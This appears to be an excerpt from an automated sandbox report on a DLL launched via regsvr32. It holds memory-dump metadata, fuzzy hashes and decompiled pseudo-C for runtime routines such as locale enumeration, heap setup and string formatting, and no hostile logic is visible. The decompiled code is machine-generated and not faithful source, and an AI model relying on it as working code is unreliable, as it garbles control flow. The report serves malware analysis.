                                                                                                              • EnumSystemLocalesW.KERNEL32(?,?,00000000,00000001800474BB,?,?,?,?,?,?,?,?,00000000,000000018004B6F4), ref: 00000001800466B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumLocalesSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099609381-0
                                                                                                              • Opcode ID: ba1def702d92e8a95ffcbe92af6e8cf28018d5c85ff05b17eaa361da225a80cc
                                                                                                              • Instruction ID: ba87133ad5258a55a08c06e6b0d9f9c469f1cf7f542c36b29db8a57471a7f423
                                                                                                              • Opcode Fuzzy Hash: ba1def702d92e8a95ffcbe92af6e8cf28018d5c85ff05b17eaa361da225a80cc
                                                                                                              • Instruction Fuzzy Hash: B3F03C72300A4882E785DB25E8903D963A2F79C7D4F55C125FA4D83366DF3DC699C344
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004C150 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118004C150(void* __edx, void* __rax, long long __rbx, signed char* __rcx, signed long long __rdx, long long _a8) {
				int _t15;
				void* _t22;
				signed char* _t25;
				signed long long _t29;
				signed long long _t31;
				void* _t32;

				_t29 = __rdx;
				_t22 = __rax;
				_a8 = __rbx;
				_t25 = __rcx;
				E0000000118003CFF0(__rax, __rcx, __rdx, _t32);
				_t31 = (_t29 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t22 + 0xa0)) + _t31 * 2)) != 0) goto 0x8004c172;
				 *(_t22 + 0xb4) = 0 | _t31 == 0x00000003;
				_t15 = EnumSystemLocalesW(??, ??);
				if (( *_t25 & 0x00000004) != 0) goto 0x8004c1a4;
				 *_t25 = 0;
				return _t15;
			}









                                                                                                              0x18004c150
                                                                                                              0x18004c150
                                                                                                              0x18004c150
                                                                                                              0x18004c15a
                                                                                                              0x18004c15d
                                                                                                              0x18004c172
                                                                                                              0x18004c179
                                                                                                              0x18004c190
                                                                                                              0x18004c197
                                                                                                              0x18004c1a0
                                                                                                              0x18004c1a2
                                                                                                              0x18004c1ae

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3029459697-0
                                                                                                              • Opcode ID: b8ee0502ff824193323125283b8464ff63aa9831de222f9573b8ca6e83823bf9
                                                                                                              • Instruction ID: 31820b48630101ea642ae716095b38231b07873db3cd3973771d5387480055a0
                                                                                                              • Opcode Fuzzy Hash: b8ee0502ff824193323125283b8464ff63aa9831de222f9573b8ca6e83823bf9
                                                                                                              • Instruction Fuzzy Hash: BAF0897270078881EB925F25E540799BBE1D795BF4F19C311E674436E5CE74C694C301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180046788 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumLocalesSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099609381-0
                                                                                                              • Opcode ID: f7aed0fdf31a97c1444b6123fb62bc774cef6810465702e4fb5ccbf4192d993c
                                                                                                              • Instruction ID: 93019bb43afba3089c78001942fb653200be660fe0497971c153cfd4178c72f3
                                                                                                              • Opcode Fuzzy Hash: f7aed0fdf31a97c1444b6123fb62bc774cef6810465702e4fb5ccbf4192d993c
                                                                                                              • Instruction Fuzzy Hash: 98E01AB5710A0881EB85DB15EC9139533A2B35DBE0F90D116E90D87725DE3EC29D8340
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180046810 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumLocalesSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099609381-0
                                                                                                              • Opcode ID: cfa96960963232b9b504c79c6856cfa8b6addbd21d96258ee9666e8cf9cb6dcf
                                                                                                              • Instruction ID: d9d78c61b36ce8ee1df59b2cd1ce9247de0cb83687b60b09247d975857a00761
                                                                                                              • Opcode Fuzzy Hash: cfa96960963232b9b504c79c6856cfa8b6addbd21d96258ee9666e8cf9cb6dcf
                                                                                                              • Instruction Fuzzy Hash: 39E08C70610A0981E3859B51FC603E523A2B3ED7E4F908216F80D57321DE3E839D8340
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180026A24 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: dcdd848495dbafeb9bc5f26249417655877a00d055c837b1d3a73128db9fb091
                                                                                                              • Instruction ID: d7683a3b78e2aa861da3147e7b8a08a9c942228ccad78e55904ff1517cca5c5c
                                                                                                              • Opcode Fuzzy Hash: dcdd848495dbafeb9bc5f26249417655877a00d055c837b1d3a73128db9fb091
                                                                                                              • Instruction Fuzzy Hash: 8AB19072A04B9C86E7A78F29C0543AC3BA0F34DB89F249119EF4A473A5CF35C699C745
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800548F8 Relevance: 1.4, APIs: 1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 82%
                                                                                                              			E000000011800548F8(void* __ecx, void* __edx, void* __rcx, void* __r8, void* __r10, void* __r11, signed long long* _a40) {
				signed int _v72;
				char _v200;
				signed int _v216;
				intOrPtr _v232;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long long _t14;
				intOrPtr _t41;
				intOrPtr _t45;
				signed long long _t60;
				signed long long _t61;
				signed long long _t62;
				void* _t63;
				long long _t64;
				signed long long _t65;
				signed long long _t85;
				signed long long* _t86;
				void* _t87;
				signed long long _t88;
				void* _t98;
				void* _t99;

				_t60 =  *0x80070098; // 0xde2ac6aee6eb
				_t61 = _t60 ^ _t88;
				_v72 = _t61;
				_t86 = _a40;
				_t45 = r9d;
				_t99 = __r8;
				_t98 = __rcx;
				 *_t86 = _t85;
				if (__edx != 1) goto 0x80054a15;
				_v232 = 0x80;
				r8d = _t45;
				_t14 = E00000001180054774(__ecx, __edx - 1, _t63, __rcx, __r8, _t85, _t86, __r8,  &_v200, __r10);
				_t64 = _t14;
				if (_t14 == 0) goto 0x8005499d;
				E00000001180042404(_t14, _t64, __r8);
				 *_t86 = _t61;
				E0000000118003F8F4(_t61, _t64);
				if ( *_t86 == _t85) goto 0x80054a86;
				_t6 = _t64 - 1; // -1
				if (E00000001180052610(_t61, _t64,  *_t86, _t64, _t86,  &_v200, _t6) != 0) goto 0x80054aab;
				goto 0x80054a89;
				if (GetLastError() != 0x7a) goto 0x80054a86;
				r9d = 0;
				_v232 = 0;
				r8d = _t45;
				if (E00000001180054774(0, GetLastError() - 0x7a, _t64, _t98, _t99, _t85, _t86,  &_v200, _t6, __r10) == 0) goto 0x80054a86;
				E00000001180042404(_t21, _t21, _t99);
				_t65 = _t61;
				if (_t61 == 0) goto 0x80054a06;
				_v232 = r15d;
				r8d = _t45;
				if (E00000001180054774(0, _t61, _t65, _t98, _t99, _t85, _t86,  &_v200, _t61, __r10) == 0) goto 0x80054a06;
				_t62 = _t65;
				 *_t86 = _t62;
				goto 0x80054a09;
				E0000000118003F8F4(_t62, _t85);
				goto 0x80054a89;
				if (1 != 2) goto 0x80054a59;
				r9d = 0;
				r8d = 0;
				if (E000000011800475F0(_t45, 1 - 2, _t62, _t85, _t99, _t86, _t87,  &_v200) == 0) goto 0x80054a86;
				E00000001180042404(_t26, _t26, _t99);
				if (_t62 == 0) goto 0x80054a06;
				r9d = r15d;
				_t41 = _t45;
				E000000011800475F0(_t41, _t62, _t62, _t62, _t99, _t86, _t87, _t62);
				goto 0x800549f7;
				if (_t41 != 0) goto 0x80054a86;
				asm("bts ebp, 0x1d");
				_v216 = 0xffffffff;
				r9d = 2;
				if (E000000011800475F0(_t45, _t41, _t62, _t62, _t99, _t86, _t87,  &_v216) == 0) goto 0x80054a86;
				 *_t86 = _v216;
				goto 0x80054996;
				return E000000011800028F0(_v216 | 0xffffffff, 0, _v72 ^ _t88);
			}


























                                                                                                              0x18005490a
                                                                                                              0x180054911
                                                                                                              0x180054914
                                                                                                              0x18005491c
                                                                                                              0x180054926
                                                                                                              0x180054929
                                                                                                              0x18005492c
                                                                                                              0x18005492f
                                                                                                              0x180054935
                                                                                                              0x180054940
                                                                                                              0x180054948
                                                                                                              0x18005494e
                                                                                                              0x180054953
                                                                                                              0x180054958
                                                                                                              0x180054960
                                                                                                              0x180054967
                                                                                                              0x18005496a
                                                                                                              0x180054972
                                                                                                              0x18005497b
                                                                                                              0x180054990
                                                                                                              0x180054998
                                                                                                              0x1800549a6
                                                                                                              0x1800549ac
                                                                                                              0x1800549af
                                                                                                              0x1800549b3
                                                                                                              0x1800549c6
                                                                                                              0x1800549d4
                                                                                                              0x1800549d9
                                                                                                              0x1800549df
                                                                                                              0x1800549e4
                                                                                                              0x1800549e9
                                                                                                              0x1800549f9
                                                                                                              0x1800549fb
                                                                                                              0x180054a01
                                                                                                              0x180054a04
                                                                                                              0x180054a0c
                                                                                                              0x180054a13
                                                                                                              0x180054a1c
                                                                                                              0x180054a1e
                                                                                                              0x180054a21
                                                                                                              0x180054a33
                                                                                                              0x180054a3a
                                                                                                              0x180054a45
                                                                                                              0x180054a47
                                                                                                              0x180054a4d
                                                                                                              0x180054a52
                                                                                                              0x180054a57
                                                                                                              0x180054a5b
                                                                                                              0x180054a5d
                                                                                                              0x180054a61
                                                                                                              0x180054a6c
                                                                                                              0x180054a79
                                                                                                              0x180054a7f
                                                                                                              0x180054a81
                                                                                                              0x180054aaa

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32 ref: 000000018005499D
                                                                                                                • Part of subcall function 0000000180042404: RtlAllocateHeap.NTDLL(?,?,00000000,000000018003D1CA,?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 0000000180042459
                                                                                                                • Part of subcall function 000000018003F8F4: HeapFree.KERNEL32 ref: 000000018003F90A
                                                                                                                • Part of subcall function 000000018003F8F4: GetLastError.KERNEL32 ref: 000000018003F914
                                                                                                                • Part of subcall function 0000000180052610: _invalid_parameter_noinfo.LIBCMT ref: 0000000180052643
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 3806578645-0
                                                                                                              • Opcode ID: 2212948e5e04e90042b662dfa80326f5f79311fcba216df6c5fd3c7472666429
                                                                                                              • Instruction ID: ca78092d9e7279d67b1ff0ee6b84806fb3d36e03269d009914ef178b6b070679
                                                                                                              • Opcode Fuzzy Hash: 2212948e5e04e90042b662dfa80326f5f79311fcba216df6c5fd3c7472666429
                                                                                                              • Instruction Fuzzy Hash: 2C41193230178942FAF29B2668417EAA284BB8D7C8F44D525BE495F782EE39C6098704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180048198 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 100%
                                                                                                              			E00000001180048198(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x80072088 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                              0x18004819c
                                                                                                              0x1800481a5
                                                                                                              0x1800481b3

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 54951025-0
                                                                                                              • Opcode ID: 32917af188f0279a018bcd031cbb80975c23caed2b7138c6531a4566827aba6f
                                                                                                              • Instruction ID: 9663c878a0b10e5d5e05c19db7434f01174b55cc95ffec528ac78e228b9b3088
                                                                                                              • Opcode Fuzzy Hash: 32917af188f0279a018bcd031cbb80975c23caed2b7138c6531a4566827aba6f
                                                                                                              • Instruction Fuzzy Hash: D2B09230A03A0DC6EA8A2B116C8234422A8BB5C740F94801AA00C91320DE2D02ED9711
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002D19C Relevance: .4, Instructions: 368COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 45%
                                                                                                              			E0000000118002D19C(intOrPtr __edi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				short _v64;
				char _v68;
				signed short _v72;
				long long _v88;
				void* __rdi;
				signed int _t133;
				void* _t136;
				void* _t142;
				void* _t179;
				unsigned int _t180;
				signed char _t181;
				signed short _t212;
				intOrPtr _t215;
				signed short _t224;
				void* _t225;
				signed long long _t296;
				void* _t312;
				void* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed short* _t318;
				void* _t332;
				signed long long _t334;
				signed int* _t338;
				void* _t346;
				signed long long _t347;
				void* _t349;
				void* _t355;
				void* _t359;
				void* _t361;
				signed long long _t363;
				void* _t365;
				intOrPtr _t366;
				intOrPtr* _t367;

				_t359 = __r10;
				_t349 = __r8;
				_t340 = __rbp;
				_t337 = __rsi;
				_t314 = __rcx;
				_t215 = __edi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t347 = _t346 - 0x50;
				_t296 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t296 ^ _t347;
				_t133 =  *(__rcx + 0x3a) & 0x0000ffff;
				_t312 = __rcx;
				_t6 = _t337 - 0x20; // 0x58
				_t224 = _t6;
				_t7 = _t337 - 0x77; // 0x1
				r12d = _t7;
				_t225 = _t133 - 0x64;
				if (_t225 > 0) goto 0x8002d252;
				if (_t225 == 0) goto 0x8002d2c3;
				if (_t133 == 0x41) goto 0x8002d2d0;
				if (_t133 == 0x43) goto 0x8002d22f;
				if (_t133 - 0x44 <= 0) goto 0x8002d2dc;
				if (_t133 - 0x47 <= 0) goto 0x8002d2d0;
				if (_t133 == 0x53) goto 0x8002d285;
				if (_t133 == _t224) goto 0x8002d245;
				if (_t133 == 0x5a) goto 0x8002d23b;
				if (_t133 == 0x61) goto 0x8002d2d0;
				if (_t133 != 0x63) goto 0x8002d2dc;
				E00000001180031618(0, _t133 - 0x63, __rcx, __rcx, __rsi, __rbp);
				goto 0x8002d2d5;
				E0000000118002F058(_t179, 0, _t133 - 0x63, __rcx, __rcx, _t337);
				goto 0x8002d2d5;
				_t136 = E0000000118001F104(r12b, 0x78, _t312, _t314, _t332, _t337, _t349);
				goto 0x8002d2d5;
				if (_t136 - 0x67 <= 0) goto 0x8002d2d0;
				if (_t136 == 0x69) goto 0x8002d2c3;
				if (_t136 == 0x6e) goto 0x8002d2bc;
				if (_t136 == 0x6f) goto 0x8002d29c;
				if (_t136 == 0x70) goto 0x8002d28c;
				if (_t136 == 0x73) goto 0x8002d285;
				if (_t136 == 0x75) goto 0x8002d2c7;
				if (_t136 != 0x78) goto 0x8002d2dc;
				goto 0x8002d248;
				E00000001180032AEC(0, _t136 - 0x78, _t296 ^ _t347, _t312, _t314, _t337, _t340, _t361);
				goto 0x8002d2d5;
				 *((intOrPtr*)(_t314 + 0x30)) = 0x10;
				 *((intOrPtr*)(_t314 + 0x34)) = 0xb;
				goto 0x8002d245;
				_t180 =  *(_t314 + 0x28);
				if ((r12b & _t180 >> 0x00000005) == 0) goto 0x8002d2b0;
				asm("bts ecx, 0x7");
				 *(_t312 + 0x28) = _t180;
				_t315 = _t312;
				E0000000118001C0F4(0, 0x78, _t312, _t315, _t332, _t337, _t349);
				goto 0x8002d2d5;
				E00000001180032030(0, r12b & _t180 >> 0x00000005, _t315);
				goto 0x8002d2d5;
				 *(_t315 + 0x28) =  *(_t315 + 0x28) | 0x00000010;
				0x8001d8fc();
				goto 0x8002d2d5;
				_t142 = E00000001180030384(0, _t215, _t312, _t315, _t340);
				r13d = 0;
				if (_t142 != 0) goto 0x8002d2e3;
				goto 0x8002d655;
				if ( *((intOrPtr*)(_t312 + 0x474)) != 2) goto 0x8002d2f9;
				if ( *((intOrPtr*)(_t312 + 0x470)) == r12d) goto 0x8002d652;
				if ( *((intOrPtr*)(_t312 + 0x38)) != r13b) goto 0x8002d652;
				_t181 =  *(_t312 + 0x28);
				_v68 = 0;
				_v64 = 0;
				r10d = 0x20;
				if ((r12b & 0) == 0) goto 0x8002d357;
				if ((r12b & 0) == 0) goto 0x8002d339;
				_v68 = _t359 + 0xd;
				goto 0x8002d354;
				if ((r12b & _t181) == 0) goto 0x8002d345;
				goto 0x8002d332;
				if ((r12b & 0) == 0) goto 0x8002d357;
				_v68 = r10w;
				_t334 = _t363;
				_t212 =  *(_t312 + 0x3a) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t212 & 0x0000ffff) - _t224) != 0) goto 0x8002d37a;
				r8b = r12b;
				if ((r12b & 0) != 0) goto 0x8002d37d;
				r8b = r13b;
				r9d = 0x30;
				if (r8b != 0) goto 0x8002d396;
				if (0 == 0) goto 0x8002d3b3;
				 *(_t347 + 0x34 + _t334 * 2) = r9w;
				if (_t212 == _t224) goto 0x8002d3a7;
				if (_t212 != 0x41) goto 0x8002d3aa;
				 *((short*)(_t347 + 0x36 + _t334 * 2)) = _t224 & 0x0000ffff;
				r15d =  *((intOrPtr*)(_t312 + 0x2c));
				r14d = 0xffff;
				r15d = r15d -  *((intOrPtr*)(_t312 + 0x48));
				r15d = r15d - _t215;
				if ((_t181 & 0x0000000c) != 0) goto 0x8002d42e;
				if (r15d <= 0) goto 0x8002d42e;
				if ((r12b &  *( *((intOrPtr*)(_t312 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002d3f4;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0x460)) + 8)) == _t365) goto 0x8002d412;
				if (E000000011800414D8(r10d, _t312,  *((intOrPtr*)(_t312 + 0x460)),  *((intOrPtr*)(_t312 + 8)), _t355) == r14w) goto 0x8002d42a;
				r10d = 0x20;
				 *(_t312 + 0x20) = _t315 + 1;
				if ( *(_t312 + 0x20) == 0xfffffffe) goto 0x8002d42e;
				if (r13d + r12d - r15d < 0) goto 0x8002d3d5;
				goto 0x8002d42e;
				 *(_t312 + 0x20) =  *(_t312 + 0x20) | 0xffffffff;
				_t367 = _t312 + 0x460;
				_t338 = _t312 + 0x20;
				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x8002d458;
				if ( *((intOrPtr*)( *_t367 + 8)) != _t365) goto 0x8002d458;
				 *_t338 =  *_t338 + _t215;
				goto 0x8002d470;
				_v88 =  *((intOrPtr*)(_t312 + 8));
				r8d = _t215;
				_t316 = _t367;
				E000000011800362BC(_t312, _t316,  &_v68, _t338,  *((intOrPtr*)(_t312 + 8)), _t338);
				if ((r12b & 0) == 0) goto 0x8002d4db;
				if ((r12b &  *(_t312 + 0x28) >> 0x00000002) != 0) goto 0x8002d4db;
				if (r15d <= 0) goto 0x8002d4db;
				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x8002d4a8;
				if ( *((intOrPtr*)( *_t367 + 8)) == _t365) goto 0x8002d4c2;
				if (E000000011800414D8(0x30, _t312,  *_t367,  *((intOrPtr*)(_t312 + 8)), _t338) == 0xffff) goto 0x8002d4d8;
				_t85 = _t316 + 1; // 0x10000
				 *_t338 = _t85;
				if ( *_t338 == 0xfffffffe) goto 0x8002d4db;
				if (r13d + r12d - r15d < 0) goto 0x8002d491;
				goto 0x8002d4db;
				 *_t338 =  *_t338 | 0xffffffff;
				if ( *((intOrPtr*)(_t312 + 0x4c)) != r13b) goto 0x8002d60c;
				if ( *((intOrPtr*)(_t312 + 0x48)) <= 0) goto 0x8002d60c;
				_t366 =  *((intOrPtr*)(_t312 + 8));
				if ( *((intOrPtr*)(_t366 + 0x28)) != 0) goto 0x8002d509;
				0x800338e0();
				if ( *((intOrPtr*)(_t312 + 0x48)) == 0) goto 0x8002d58e;
				_t92 = _t366 + 0x18; // 0x4c08245c8948cccc
				_v72 = 0;
				_t318 =  &_v72;
				if (E00000001180040E3C(0, _t224, _t312, _t318,  *((intOrPtr*)(_t312 + 0x40)), _t334 + 2, _t338,  *((intOrPtr*)(_t312 + 0x40)),  *((intOrPtr*)( *_t92 + 8)),  *((intOrPtr*)(_t312 + 8))) <= 0) goto 0x8002d600;
				if (( *( *_t367 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8002d55d;
				if ( *((long long*)( *_t367 + 8)) == 0) goto 0x8002d56f;
				if (E000000011800414D8(_v72 & 0x0000ffff, _t312,  *_t367,  *((intOrPtr*)(_t312 + 8)),  *((intOrPtr*)(_t312 + 8))) == 0xffff) goto 0x8002d574;
				 *(_t312 + 0x20) =  *(_t312 + 0x20) + 1;
				goto 0x8002d578;
				 *(_t312 + 0x20) =  *(_t312 + 0x20) | 0xffffffff;
				r12d = 1;
				if (0 + r12d !=  *((intOrPtr*)(_t312 + 0x48))) goto 0x8002d513;
				r13d = 0;
				if ( *_t338 - r13d < 0) goto 0x8002d652;
				if ((r12b & 0) == 0) goto 0x8002d652;
				if (r15d <= 0) goto 0x8002d652;
				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x8002d5d0;
				if ( *((intOrPtr*)( *_t367 + 8)) == _t366) goto 0x8002d5ea;
				if (E000000011800414D8(0x20, _t312,  *_t367,  *((intOrPtr*)(_t312 + 8)),  *((intOrPtr*)(_t312 + 8))) == 0xffff) goto 0x8002d64f;
				_t117 = _t318 + 1; // 0x10000
				 *_t338 = _t117;
				if ( *_t338 == 0xfffffffe) goto 0x8002d652;
				if (r13d + r12d - r15d < 0) goto 0x8002d5b9;
				goto 0x8002d652;
				 *(_t312 + 0x20) =  *(_t312 + 0x20) | 0xffffffff;
				r12d = 1;
				goto 0x8002d58e;
				r8d =  *((intOrPtr*)(_t312 + 0x48));
				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x8002d637;
				if ( *((intOrPtr*)( *_t367 + 8)) != _t366) goto 0x8002d637;
				 *_t338 =  *_t338 + r8d;
				goto 0x8002d591;
				_v88 =  *((intOrPtr*)(_t312 + 8));
				E000000011800362BC(_t312, _t367,  *((intOrPtr*)(_t312 + 0x40)), _t338,  *((intOrPtr*)(_t312 + 0x40)) + _t168, _t338);
				goto 0x8002d591;
				 *_t338 =  *_t338 | 0xffffffff;
				return E000000011800028F0(r12b,  *( *_t367 + 0x14) >> 0xc, _v56 ^ _t347);
			}







































                                                                                                              0x18002d19c
                                                                                                              0x18002d19c
                                                                                                              0x18002d19c
                                                                                                              0x18002d19c
                                                                                                              0x18002d19c
                                                                                                              0x18002d19c
                                                                                                              0x18002d19c
                                                                                                              0x18002d1a1
                                                                                                              0x18002d1a6
                                                                                                              0x18002d1b4
                                                                                                              0x18002d1b8
                                                                                                              0x18002d1c2
                                                                                                              0x18002d1c7
                                                                                                              0x18002d1d0
                                                                                                              0x18002d1d3
                                                                                                              0x18002d1d3
                                                                                                              0x18002d1d6
                                                                                                              0x18002d1d6
                                                                                                              0x18002d1da
                                                                                                              0x18002d1de
                                                                                                              0x18002d1e0
                                                                                                              0x18002d1ea
